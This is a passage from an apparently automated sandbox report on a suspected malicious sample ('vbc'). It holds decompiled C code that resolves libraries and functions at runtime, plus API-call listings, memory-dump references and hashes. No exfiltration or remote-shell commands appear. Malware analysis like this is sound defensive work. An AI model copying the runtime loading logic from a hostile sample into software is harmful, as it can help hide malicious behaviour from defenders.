                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                    • String ID: .$.$C:\Users\user\AppData\Local\Temp\$P?z$\*.*
                    • API String ID: 2035342205-3834854073
                    • Opcode ID: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                    • Instruction ID: 717efa72a3eb519caeee53ac910e89dbb8479b941b5c6030fce336447c755aae
                    • Opcode Fuzzy Hash: 86a9ea6cbb14b57aebf4225f9df046bf70f97581db132fea7010d611e8ef0d07
                    • Instruction Fuzzy Hash: C341B230800A14BADB21AB659D8DAAF7778DF85718F24813FF401751D1D77C4A82DE6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 95%
                    			E734F1BFF() {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				WCHAR* _v24;
                    				WCHAR* _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				signed int _v44;
                    				WCHAR* _v48;
                    				signed int _v52;
                    				void* _v56;
                    				intOrPtr _v60;
                    				WCHAR* _t208;
                    				signed int _t211;
                    				void* _t213;
                    				void* _t215;
                    				WCHAR* _t217;
                    				void* _t225;
                    				struct HINSTANCE__* _t226;
                    				struct HINSTANCE__* _t227;
                    				struct HINSTANCE__* _t229;
                    				signed short _t231;
                    				struct HINSTANCE__* _t234;
                    				struct HINSTANCE__* _t236;
                    				void* _t237;
                    				intOrPtr* _t238;
                    				void* _t249;
                    				signed char _t250;
                    				signed int _t251;
                    				void* _t255;
                    				struct HINSTANCE__* _t257;
                    				void* _t258;
                    				signed int _t260;
                    				signed int _t261;
                    				signed short* _t264;
                    				signed int _t269;
                    				signed int _t272;
                    				signed int _t274;
                    				void* _t277;
                    				void* _t281;
                    				struct HINSTANCE__* _t283;
                    				signed int _t286;
                    				void _t287;
                    				signed int _t288;
                    				signed int _t300;
                    				signed int _t301;
                    				signed short _t304;
                    				void* _t305;
                    				signed int _t309;
                    				signed int _t312;
                    				signed int _t315;
                    				signed int _t316;
                    				signed int _t317;
                    				signed short* _t321;
                    				WCHAR* _t322;
                    				WCHAR* _t324;
                    				WCHAR* _t325;
                    				struct HINSTANCE__* _t326;
                    				void* _t328;
                    				signed int _t331;
                    				void* _t332;
                    
                    				_t283 = 0;
                    				_v32 = 0;
                    				_v36 = 0;
                    				_v16 = 0;
                    				_v8 = 0;
                    				_v40 = 0;
                    				_t332 = 0;
                    				_v52 = 0;
                    				_v44 = 0;
                    				_t208 = E734F12BB();
                    				_v24 = _t208;
                    				_v28 = _t208;
                    				_v48 = E734F12BB();
                    				_t321 = E734F12E3();
                    				_v56 = _t321;
                    				_v12 = _t321;
                    				while(1) {
                    					_t211 = _v32;
                    					_v60 = _t211;
                    					if(_t211 != _t283 && _t332 == _t283) {
                    						break;
                    					}
                    					_t286 =  *_t321 & 0x0000ffff;
                    					_t213 = _t286 - _t283;
                    					if(_t213 == 0) {
                    						_t37 =  &_v32;
                    						 *_t37 = _v32 | 0xffffffff;
                    						__eflags =  *_t37;
                    						L20:
                    						_t215 = _v60 - _t283;
                    						if(_t215 == 0) {
                    							__eflags = _t332 - _t283;
                    							 *_v28 = _t283;
                    							if(_t332 == _t283) {
                    								_t255 = GlobalAlloc(0x40, 0x1ca4); // executed
                    								_t332 = _t255;
                    								 *(_t332 + 0x1010) = _t283;
                    								 *(_t332 + 0x1014) = _t283;
                    							}
                    							_t287 = _v36;
                    							_t47 = _t332 + 8; // 0x8
                    							_t217 = _t47;
                    							_t48 = _t332 + 0x808; // 0x808
                    							_t322 = _t48;
                    							 *_t332 = _t287;
                    							_t288 = _t287 - _t283;
                    							__eflags = _t288;
                    							 *_t217 = _t283;
                    							 *_t322 = _t283;
                    							 *(_t332 + 0x1008) = _t283;
                    							 *(_t332 + 0x100c) = _t283;
                    							 *(_t332 + 4) = _t283;
                    							if(_t288 == 0) {
                    								__eflags = _v28 - _v24;
                    								if(_v28 == _v24) {
                    									goto L42;
                    								}
                    								_t328 = 0;
                    								GlobalFree(_t332);
                    								_t332 = E734F13B1(_v24);
                    								__eflags = _t332 - _t283;
                    								if(_t332 == _t283) {
                    									goto L42;
                    								} else {
                    									goto L35;
                    								}
                    								while(1) {
                    									L35:
                    									_t249 =  *(_t332 + 0x1ca0);
                    									__eflags = _t249 - _t283;
                    									if(_t249 == _t283) {
                    										break;
                    									}
                    									_t328 = _t332;
                    									_t332 = _t249;
                    									__eflags = _t332 - _t283;
                    									if(_t332 != _t283) {
                    										continue;
                    									}
                    									break;
                    								}
                    								__eflags = _t328 - _t283;
                    								if(_t328 != _t283) {
                    									 *(_t328 + 0x1ca0) = _t283;
                    								}
                    								_t250 =  *(_t332 + 0x1010);
                    								__eflags = _t250 & 0x00000008;
                    								if((_t250 & 0x00000008) == 0) {
                    									_t251 = _t250 | 0x00000002;
                    									__eflags = _t251;
                    									 *(_t332 + 0x1010) = _t251;
                    								} else {
                    									_t332 = E734F162F(_t332);
                    									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                    								}
                    								goto L42;
                    							} else {
                    								_t300 = _t288 - 1;
                    								__eflags = _t300;
                    								if(_t300 == 0) {
                    									L31:
                    									lstrcpyW(_t217, _v48);
                    									L32:
                    									lstrcpyW(_t322, _v24);
                    									goto L42;
                    								}
                    								_t301 = _t300 - 1;
                    								__eflags = _t301;
                    								if(_t301 == 0) {
                    									goto L32;
                    								}
                    								__eflags = _t301 != 1;
                    								if(_t301 != 1) {
                    									goto L42;
                    								}
                    								goto L31;
                    							}
                    						} else {
                    							if(_t215 == 1) {
                    								_t257 = _v16;
                    								if(_v40 == _t283) {
                    									_t257 = _t257 - 1;
                    								}
                    								 *(_t332 + 0x1014) = _t257;
                    							}
                    							L42:
                    							_v12 = _v12 + 2;
                    							_v28 = _v24;
                    							L59:
                    							if(_v32 != 0xffffffff) {
                    								_t321 = _v12;
                    								continue;
                    							}
                    							break;
                    						}
                    					}
                    					_t258 = _t213 - 0x23;
                    					if(_t258 == 0) {
                    						__eflags = _t321 - _v56;
                    						if(_t321 <= _v56) {
                    							L17:
                    							__eflags = _v44 - _t283;
                    							if(_v44 != _t283) {
                    								L43:
                    								_t260 = _v32 - _t283;
                    								__eflags = _t260;
                    								if(_t260 == 0) {
                    									_t261 = _t286;
                    									while(1) {
                    										__eflags = _t261 - 0x22;
                    										if(_t261 != 0x22) {
                    											break;
                    										}
                    										_t321 =  &(_t321[1]);
                    										__eflags = _v44 - _t283;
                    										_v12 = _t321;
                    										if(_v44 == _t283) {
                    											_v44 = 1;
                    											L162:
                    											_v28 =  &(_v28[0]);
                    											 *_v28 =  *_t321;
                    											L58:
                    											_t331 =  &(_t321[1]);
                    											__eflags = _t331;
                    											_v12 = _t331;
                    											goto L59;
                    										}
                    										_t261 =  *_t321 & 0x0000ffff;
                    										_v44 = _t283;
                    									}
                    									__eflags = _t261 - 0x2a;
                    									if(_t261 == 0x2a) {
                    										_v36 = 2;
                    										L57:
                    										_t321 = _v12;
                    										_v28 = _v24;
                    										_t283 = 0;
                    										__eflags = 0;
                    										goto L58;
                    									}
                    									__eflags = _t261 - 0x2d;
                    									if(_t261 == 0x2d) {
                    										L151:
                    										_t304 =  *_t321;
                    										__eflags = _t304 - 0x2d;
                    										if(_t304 != 0x2d) {
                    											L154:
                    											_t264 =  &(_t321[1]);
                    											__eflags =  *_t264 - 0x3a;
                    											if( *_t264 != 0x3a) {
                    												goto L162;
                    											}
                    											__eflags = _t304 - 0x2d;
                    											if(_t304 == 0x2d) {
                    												goto L162;
                    											}
                    											_v36 = 1;
                    											L157:
                    											_v12 = _t264;
                    											__eflags = _v28 - _v24;
                    											if(_v28 <= _v24) {
                    												 *_v48 = _t283;
                    											} else {
                    												 *_v28 = _t283;
                    												lstrcpyW(_v48, _v24);
                    											}
                    											goto L57;
                    										}
                    										_t264 =  &(_t321[1]);
                    										__eflags =  *_t264 - 0x3e;
                    										if( *_t264 != 0x3e) {
                    											goto L154;
                    										}
                    										_v36 = 3;
                    										goto L157;
                    									}
                    									__eflags = _t261 - 0x3a;
                    									if(_t261 != 0x3a) {
                    										goto L162;
                    									}
                    									goto L151;
                    								}
                    								_t269 = _t260 - 1;
                    								__eflags = _t269;
                    								if(_t269 == 0) {
                    									L80:
                    									_t305 = _t286 + 0xffffffde;
                    									__eflags = _t305 - 0x55;
                    									if(_t305 > 0x55) {
                    										goto L57;
                    									}
                    									switch( *((intOrPtr*)(( *(_t305 + 0x734f23e8) & 0x000000ff) * 4 +  &M734F235C))) {
                    										case 0:
                    											__ecx = _v24;
                    											__edi = _v12;
                    											while(1) {
                    												__edi = __edi + 1;
                    												__edi = __edi + 1;
                    												_v12 = __edi;
                    												__ax =  *__edi;
                    												__eflags = __ax - __dx;
                    												if(__ax != __dx) {
                    													goto L132;
                    												}
                    												L131:
                    												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                    												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                    													L136:
                    													 *__ecx =  *__ecx & 0x00000000;
                    													__eax = E734F12CC(_v24);
                    													__ebx = __eax;
                    													goto L97;
                    												}
                    												L132:
                    												__eflags = __ax;
                    												if(__ax == 0) {
                    													goto L136;
                    												}
                    												__eflags = __ax - __dx;
                    												if(__ax == __dx) {
                    													__edi = __edi + 1;
                    													__edi = __edi + 1;
                    													__eflags = __edi;
                    												}
                    												__ax =  *__edi;
                    												 *__ecx =  *__edi;
                    												__ecx = __ecx + 1;
                    												__ecx = __ecx + 1;
                    												__edi = __edi + 1;
                    												__edi = __edi + 1;
                    												_v12 = __edi;
                    												__ax =  *__edi;
                    												__eflags = __ax - __dx;
                    												if(__ax != __dx) {
                    													goto L132;
                    												}
                    												goto L131;
                    											}
                    										case 1:
                    											_v8 = 1;
                    											goto L57;
                    										case 2:
                    											_v8 = _v8 | 0xffffffff;
                    											goto L57;
                    										case 3:
                    											_v8 = _v8 & 0x00000000;
                    											_v20 = _v20 & 0x00000000;
                    											_v16 = _v16 + 1;
                    											goto L85;
                    										case 4:
                    											__eflags = _v20;
                    											if(_v20 != 0) {
                    												goto L57;
                    											}
                    											_v12 = _v12 - 2;
                    											__ebx = E734F12BB();
                    											 &_v12 = E734F1B86( &_v12);
                    											__eax = E734F1510(__edx, __eax, __edx, __ebx);
                    											goto L97;
                    										case 5:
                    											L105:
                    											_v20 = _v20 + 1;
                    											goto L57;
                    										case 6:
                    											_push(7);
                    											goto L123;
                    										case 7:
                    											_push(0x19);
                    											goto L143;
                    										case 8:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L107;
                    										case 9:
                    											_push(0x15);
                    											goto L143;
                    										case 0xa:
                    											_push(0x16);
                    											goto L143;
                    										case 0xb:
                    											_push(0x18);
                    											goto L143;
                    										case 0xc:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L118;
                    										case 0xd:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L109;
                    										case 0xe:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L111;
                    										case 0xf:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L122;
                    										case 0x10:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L113;
                    										case 0x11:
                    											_push(3);
                    											goto L123;
                    										case 0x12:
                    											_push(0x17);
                    											L143:
                    											_pop(__ebx);
                    											goto L98;
                    										case 0x13:
                    											__eax =  &_v12;
                    											__eax = E734F1B86( &_v12);
                    											__ebx = __eax;
                    											__ebx = __eax + 1;
                    											__eflags = __ebx - 0xb;
                    											if(__ebx < 0xb) {
                    												__ebx = __ebx + 0xa;
                    											}
                    											goto L97;
                    										case 0x14:
                    											__ebx = 0xffffffff;
                    											goto L98;
                    										case 0x15:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L116;
                    										case 0x16:
                    											__ecx = 0;
                    											__eflags = 0;
                    											goto L91;
                    										case 0x17:
                    											__eax = 0;
                    											__eax = 1;
                    											__eflags = 1;
                    											goto L120;
                    										case 0x18:
                    											_t271 =  *(_t332 + 0x1014);
                    											__eflags = _t271 - _v16;
                    											if(_t271 > _v16) {
                    												_v16 = _t271;
                    											}
                    											_v8 = _v8 & 0x00000000;
                    											_v20 = _v20 & 0x00000000;
                    											_v36 - 3 = _t271 - (_v36 == 3);
                    											if(_t271 != _v36 == 3) {
                    												L85:
                    												_v40 = 1;
                    											}
                    											goto L57;
                    										case 0x19:
                    											L107:
                    											__ecx = 0;
                    											_v8 = 2;
                    											__ecx = 1;
                    											goto L91;
                    										case 0x1a:
                    											L118:
                    											_push(5);
                    											goto L123;
                    										case 0x1b:
                    											L109:
                    											__ecx = 0;
                    											_v8 = 3;
                    											__ecx = 1;
                    											goto L91;
                    										case 0x1c:
                    											L111:
                    											__ecx = 0;
                    											__ecx = 1;
                    											goto L91;
                    										case 0x1d:
                    											L122:
                    											_push(6);
                    											goto L123;
                    										case 0x1e:
                    											L113:
                    											_push(2);
                    											goto L123;
                    										case 0x1f:
                    											__eax =  &_v12;
                    											__eax = E734F1B86( &_v12);
                    											__ebx = __eax;
                    											__ebx = __eax + 1;
                    											goto L97;
                    										case 0x20:
                    											L116:
                    											_v52 = _v52 + 1;
                    											_push(4);
                    											_pop(__ecx);
                    											goto L91;
                    										case 0x21:
                    											L120:
                    											_push(4);
                    											L123:
                    											_pop(__ecx);
                    											L91:
                    											__edi = _v16;
                    											__edx =  *(0x734f405c + __ecx * 4);
                    											__eax =  ~__eax;
                    											asm("sbb eax, eax");
                    											_v40 = 1;
                    											__edi = _v16 << 5;
                    											__eax = __eax & 0x00008000;
                    											__edi = (_v16 << 5) + __esi;
                    											__eax = __eax | __ecx;
                    											__eflags = _v8;
                    											 *(__edi + 0x1018) = __eax;
                    											if(_v8 < 0) {
                    												L93:
                    												__edx = 0;
                    												__edx = 1;
                    												__eflags = 1;
                    												L94:
                    												__eflags = _v8 - 1;
                    												 *(__edi + 0x1028) = __edx;
                    												if(_v8 == 1) {
                    													__eax =  &_v12;
                    													__eax = E734F1B86( &_v12);
                    													__eax = __eax + 1;
                    													__eflags = __eax;
                    													_v8 = __eax;
                    												}
                    												__eax = _v8;
                    												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                    												_t136 = _v16 + 0x81; // 0x81
                    												_t136 = _t136 << 5;
                    												__eax = 0;
                    												__eflags = 0;
                    												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                    												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                    												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                    												L97:
                    												__eflags = __ebx;
                    												if(__ebx == 0) {
                    													goto L57;
                    												}
                    												L98:
                    												__eflags = _v20;
                    												_v40 = 1;
                    												if(_v20 != 0) {
                    													L103:
                    													__eflags = _v20 - 1;
                    													if(_v20 == 1) {
                    														__eax = _v16;
                    														__eax = _v16 << 5;
                    														__eflags = __eax;
                    														 *(__eax + __esi + 0x102c) = __ebx;
                    													}
                    													goto L105;
                    												}
                    												_v16 = _v16 << 5;
                    												_t144 = __esi + 0x1030; // 0x1030
                    												__edi = (_v16 << 5) + _t144;
                    												__eax =  *__edi;
                    												__eflags = __eax - 0xffffffff;
                    												if(__eax <= 0xffffffff) {
                    													L101:
                    													__eax = GlobalFree(__eax);
                    													L102:
                    													 *__edi = __ebx;
                    													goto L103;
                    												}
                    												__eflags = __eax - 0x19;
                    												if(__eax <= 0x19) {
                    													goto L102;
                    												}
                    												goto L101;
                    											}
                    											__eflags = __edx;
                    											if(__edx > 0) {
                    												goto L94;
                    											}
                    											goto L93;
                    										case 0x22:
                    											goto L57;
                    									}
                    								}
                    								_t272 = _t269 - 1;
                    								__eflags = _t272;
                    								if(_t272 == 0) {
                    									_v16 = _t283;
                    									goto L80;
                    								}
                    								__eflags = _t272 != 1;
                    								if(_t272 != 1) {
                    									goto L162;
                    								}
                    								__eflags = _t286 - 0x6e;
                    								if(__eflags > 0) {
                    									_t309 = _t286 - 0x72;
                    									__eflags = _t309;
                    									if(_t309 == 0) {
                    										_push(4);
                    										L74:
                    										_pop(_t274);
                    										L75:
                    										__eflags = _v8 - 1;
                    										if(_v8 != 1) {
                    											_t96 = _t332 + 0x1010;
                    											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                    											__eflags =  *_t96;
                    										} else {
                    											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                    										}
                    										_v8 = 1;
                    										goto L57;
                    									}
                    									_t312 = _t309 - 1;
                    									__eflags = _t312;
                    									if(_t312 == 0) {
                    										_push(0x10);
                    										goto L74;
                    									}
                    									__eflags = _t312 != 0;
                    									if(_t312 != 0) {
                    										goto L57;
                    									}
                    									_push(0x40);
                    									goto L74;
                    								}
                    								if(__eflags == 0) {
                    									_push(8);
                    									goto L74;
                    								}
                    								_t315 = _t286 - 0x21;
                    								__eflags = _t315;
                    								if(_t315 == 0) {
                    									_v8 =  ~_v8;
                    									goto L57;
                    								}
                    								_t316 = _t315 - 0x11;
                    								__eflags = _t316;
                    								if(_t316 == 0) {
                    									_t274 = 0x100;
                    									goto L75;
                    								}
                    								_t317 = _t316 - 0x31;
                    								__eflags = _t317;
                    								if(_t317 == 0) {
                    									_t274 = 1;
                    									goto L75;
                    								}
                    								__eflags = _t317 != 0;
                    								if(_t317 != 0) {
                    									goto L57;
                    								}
                    								_push(0x20);
                    								goto L74;
                    							} else {
                    								_v32 = _t283;
                    								_v36 = _t283;
                    								goto L20;
                    							}
                    						}
                    						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                    						if( *((short*)(_t321 - 2)) != 0x3a) {
                    							goto L17;
                    						}
                    						__eflags = _v32 - _t283;
                    						if(_v32 == _t283) {
                    							goto L43;
                    						}
                    						goto L17;
                    					}
                    					_t277 = _t258 - 5;
                    					if(_t277 == 0) {
                    						__eflags = _v44 - _t283;
                    						if(_v44 != _t283) {
                    							goto L43;
                    						} else {
                    							__eflags = _v36 - 3;
                    							_v32 = 1;
                    							_v8 = _t283;
                    							_v20 = _t283;
                    							_v16 = (0 | _v36 == 0x00000003) + 1;
                    							_v40 = _t283;
                    							goto L20;
                    						}
                    					}
                    					_t281 = _t277 - 1;
                    					if(_t281 == 0) {
                    						__eflags = _v44 - _t283;
                    						if(_v44 != _t283) {
                    							goto L43;
                    						} else {
                    							_v32 = 2;
                    							_v8 = _t283;
                    							_v20 = _t283;
                    							goto L20;
                    						}
                    					}
                    					if(_t281 != 0x16) {
                    						goto L43;
                    					} else {
                    						_v32 = 3;
                    						_v8 = 1;
                    						goto L20;
                    					}
                    				}
                    				GlobalFree(_v56);
                    				GlobalFree(_v24);
                    				GlobalFree(_v48);
                    				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                    					L182:
                    					return _t332;
                    				} else {
                    					_t225 =  *_t332 - 1;
                    					if(_t225 == 0) {
                    						_t187 = _t332 + 8; // 0x8
                    						_t324 = _t187;
                    						__eflags =  *_t324 - _t283;
                    						if( *_t324 != _t283) {
                    							_t226 = GetModuleHandleW(_t324);
                    							__eflags = _t226 - _t283;
                    							 *(_t332 + 0x1008) = _t226;
                    							if(_t226 != _t283) {
                    								L171:
                    								_t192 = _t332 + 0x808; // 0x808
                    								_t325 = _t192;
                    								_t227 = E734F16BD( *(_t332 + 0x1008), _t325);
                    								__eflags = _t227 - _t283;
                    								 *(_t332 + 0x100c) = _t227;
                    								if(_t227 == _t283) {
                    									__eflags =  *_t325 - 0x23;
                    									if( *_t325 == 0x23) {
                    										_t195 = _t332 + 0x80a; // 0x80a
                    										_t231 = E734F13B1(_t195);
                    										__eflags = _t231 - _t283;
                    										if(_t231 != _t283) {
                    											__eflags = _t231 & 0xffff0000;
                    											if((_t231 & 0xffff0000) == 0) {
                    												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                    											}
                    										}
                    									}
                    								}
                    								__eflags = _v52 - _t283;
                    								if(_v52 != _t283) {
                    									L178:
                    									_t325[lstrlenW(_t325)] = 0x57;
                    									_t229 = E734F16BD( *(_t332 + 0x1008), _t325);
                    									__eflags = _t229 - _t283;
                    									if(_t229 != _t283) {
                    										L166:
                    										 *(_t332 + 0x100c) = _t229;
                    										goto L182;
                    									}
                    									__eflags =  *(_t332 + 0x100c) - _t283;
                    									L180:
                    									if(__eflags != 0) {
                    										goto L182;
                    									}
                    									L181:
                    									_t206 = _t332 + 4;
                    									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                    									__eflags =  *_t206;
                    									goto L182;
                    								} else {
                    									__eflags =  *(_t332 + 0x100c) - _t283;
                    									if( *(_t332 + 0x100c) != _t283) {
                    										goto L182;
                    									}
                    									goto L178;
                    								}
                    							}
                    							_t234 = LoadLibraryW(_t324); // executed
                    							__eflags = _t234 - _t283;
                    							 *(_t332 + 0x1008) = _t234;
                    							if(_t234 == _t283) {
                    								goto L181;
                    							}
                    							goto L171;
                    						}
                    						_t188 = _t332 + 0x808; // 0x808
                    						_t236 = E734F13B1(_t188);
                    						 *(_t332 + 0x100c) = _t236;
                    						__eflags = _t236 - _t283;
                    						goto L180;
                    					}
                    					_t237 = _t225 - 1;
                    					if(_t237 == 0) {
                    						_t185 = _t332 + 0x808; // 0x808
                    						_t238 = _t185;
                    						__eflags =  *_t238 - _t283;
                    						if( *_t238 == _t283) {
                    							goto L182;
                    						}
                    						_t229 = E734F13B1(_t238);
                    						L165:
                    						goto L166;
                    					}
                    					if(_t237 != 1) {
                    						goto L182;
                    					}
                    					_t81 = _t332 + 8; // 0x8
                    					_t284 = _t81;
                    					_t326 = E734F13B1(_t81);
                    					 *(_t332 + 0x1008) = _t326;
                    					if(_t326 == 0) {
                    						goto L181;
                    					}
                    					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                    					 *((intOrPtr*)(_t332 + 0x1050)) = E734F12CC(_t284);
                    					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                    					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                    					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                    					_t90 = _t332 + 0x808; // 0x808
                    					_t229 =  *(_t326->i + E734F13B1(_t90) * 4);
                    					goto L165;
                    				}
                    			}
                    0x00000000
                    0x734f1c7e
                    0x734f1c7e
                    0x734f1c85
                    0x00000000
                    0x734f1c85
                    0x734f1c78
                    0x734f1e74
                    0x734f1e79
                    0x734f1e7e
                    0x734f1e82
                    0x734f2355
                    0x734f235b
                    0x734f1e94
                    0x734f1e96
                    0x734f1e97
                    0x734f227e
                    0x734f227e
                    0x734f2281
                    0x734f2284
                    0x734f22a1
                    0x734f22a7
                    0x734f22a9
                    0x734f22af
                    0x734f22c6
                    0x734f22c6
                    0x734f22c6
                    0x734f22d3
                    0x734f22d9
                    0x734f22dc
                    0x734f22e2
                    0x734f22e4
                    0x734f22e8
                    0x734f22ea
                    0x734f22f1
                    0x734f22f6
                    0x734f22f9
                    0x734f22fb
                    0x734f2300
                    0x734f2312
                    0x734f2312
                    0x734f2300
                    0x734f22f9
                    0x734f22e8
                    0x734f2318
                    0x734f231b
                    0x734f2325
                    0x734f232d
                    0x734f233a
                    0x734f2340
                    0x734f2343
                    0x734f2273
                    0x734f2273
                    0x00000000
                    0x734f2273
                    0x734f2349
                    0x734f234f
                    0x734f234f
                    0x00000000
                    0x00000000
                    0x734f2351
                    0x734f2351
                    0x734f2351
                    0x734f2351
                    0x00000000
                    0x734f231d
                    0x734f231d
                    0x734f2323
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f2323
                    0x734f231b
                    0x734f22b2
                    0x734f22b8
                    0x734f22ba
                    0x734f22c0
                    0x00000000
                    0x00000000
                    0x00000000
                    0x734f22c0
                    0x734f2286
                    0x734f228d
                    0x734f2293
                    0x734f2299
                    0x00000000
                    0x734f2299
                    0x734f1e9d
                    0x734f1e9e
                    0x734f225d
                    0x734f225d
                    0x734f2263
                    0x734f2266
                    0x00000000
                    0x00000000
                    0x734f226d
                    0x734f2272
                    0x00000000
                    0x734f2272
                    0x734f1ea5
                    0x00000000
                    0x00000000
                    0x734f1eab
                    0x734f1eab
                    0x734f1eb4
                    0x734f1eb9
                    0x734f1ebf
                    0x00000000
                    0x00000000
                    0x734f1ec5
                    0x734f1ed2
                    0x734f1ed8
                    0x734f1ee2
                    0x734f1ee8
                    0x734f1ef0
                    0x734f1f00
                    0x00000000
                    0x734f1f00

                    APIs
                    • Part of subcall function 734F12BB: GlobalAlloc.KERNELBASE(00000040,?,734F12DB,?,734F137F,00000019,734F11CA,-000000A0), ref: 734F12C5
                    • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 734F1D2D
                    • lstrcpyW.KERNEL32(00000008,?), ref: 734F1D75
                    • lstrcpyW.KERNEL32(00000808,?), ref: 734F1D7F
                    • GlobalFree.KERNEL32(00000000), ref: 734F1D92
                    • GlobalFree.KERNEL32(?), ref: 734F1E74
                    • GlobalFree.KERNEL32(?), ref: 734F1E79
                    • GlobalFree.KERNEL32(?), ref: 734F1E7E
                    • GlobalFree.KERNEL32(00000000), ref: 734F2068
                    • lstrcpyW.KERNEL32(?,?), ref: 734F2222
                    • GetModuleHandleW.KERNEL32(00000008), ref: 734F22A1
                    • LoadLibraryW.KERNEL32(00000008), ref: 734F22B2
                    • GetProcAddress.KERNEL32(?,?), ref: 734F230C
                    • lstrlenW.KERNEL32(00000808), ref: 734F2326
                    Memory Dump Source
                    • Source File: 00000004.00000002.1159305311.00000000734F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 734F0000, based on PE: true
                    • Associated: 00000004.00000002.1159300360.00000000734F0000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159309786.00000000734F4000.00000002.00000001.01000000.00000005.sdmp
                    • Associated: 00000004.00000002.1159313695.00000000734F6000.00000002.00000001.01000000.00000005.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_734f0000_vbc.jbxd
                    Similarity
                    • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                    • String ID:
                    • API String ID: 245916457-0
                    • Opcode ID: c310631a2da6e60cef2fa28dfba38ddd2b8eb5ae73e2008d5d6b1c5e5f861635
                    • Instruction ID: eb163188c22dc03ba171614848db31c953467d1a179f3779a7a433dc90a67327
                    • Opcode Fuzzy Hash: c310631a2da6e60cef2fa28dfba38ddd2b8eb5ae73e2008d5d6b1c5e5f861635
                    • Instruction Fuzzy Hash: CB228775D0024BDFDB19DFA4C9807EEB7B5FB08319F1C452ED1A6E2284D7709A828B58
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 100%
                    			E00406850(WCHAR* _a4) {
                    				void* _t2;
                    
                    				_t2 = FindFirstFileW(_a4, 0x7a4f98); // executed
                    				if(_t2 == 0xffffffff) {
                    					return 0;
                    				}
                    				FindClose(_t2);
                    				return 0x7a4f98;
                    			}

                    APIs
                    • FindFirstFileW.KERNELBASE(7556D4C4,007A4F98,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00405F3A,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp,7556D4C4,?,C:\Users\user\AppData\Local\Temp\,00405C46,?,7556D4C4,C:\Users\user\AppData\Local\Temp\), ref: 0040685B
                    • FindClose.KERNEL32(00000000), ref: 00406867
                    Strings
                    • C:\Users\user\AppData\Local\Temp\nsf2EB0.tmp, xrefs: 00406850
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Find$CloseFileFirst
